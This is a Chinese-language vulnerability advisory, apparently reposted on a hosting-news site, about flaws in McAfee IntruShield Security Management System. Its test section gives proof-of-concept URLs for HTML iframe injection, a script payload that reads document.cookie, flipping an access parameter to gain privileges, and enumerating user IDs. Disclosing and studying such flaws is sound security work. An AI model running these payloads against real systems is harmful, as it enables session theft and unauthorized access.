McAfee IntruShield安全管理系统多个安全漏洞
2008-04-10 03:02:20来源:互联网 阅读 ()
发布日期:2005-07-07
更新日期:2005-07-07
受影响系统:
McAfee McAfee IntruShield安全管理系统描述:
BUGTRAQ ID: 14167
McAfee IntruShield安全管理系统是用于管理IntruShield传感器设备部署的高级解决方案。
McAfee IntruShield安全管理系统中存在多个漏洞:
1) 攻击者可以在MISMS中嵌入HTML,这可能允许对有效管理员帐号执行钓鱼攻击。
2) 攻击者可以在MISMS中嵌入JavaScript并在浏览管理系统用户的安全环境中执行这些嵌入的脚本。
3) 攻击者可能访问MISMS中受限制的“Generate Reports”部分,这样非特权用户就可以获取有关服务所管理的配置和IP设备设置的重要信息。
4) 攻击者可以通过在发送给系统URL中将Access选项从“false”改为“true”来确认、解除确认或删除MISMS控制台的告警。
5) 默认下,所有用户ID值在URL中都是以明文传送的,这意味着攻击者可以暴力猜测帐号。
攻击者可以利用这些漏洞远程执行代码,获得提升权限,或获取敏感信息。但是,必须有效的用户帐号才能利用这些漏洞。
<*来源:c0ntexb (c0ntexb@gmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112066594312876&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=/Demo:0&resourceName=/Demo:0/Manager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe src="http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504.htm" width=800 height=600 > </iframe>&severity=critical&count=1
2)
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager& domainName=Demo&resourceName=<script>alert("There could be trouble ahead")</script><script>alert(document.cookie)</script>&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1
3)
https://intrushield:443/intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=/Demo& selectedDomain=0&fullAccessRight=true
4)
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&domainName=/Demo:0&resourceName=辪o:0/Manager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1
5)
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=4&logo=intruvert.gif
建议:
厂商补丁:
McAfee
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mcafeesecurity.com/cn/products/mcafee/network_ips/management.htm
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash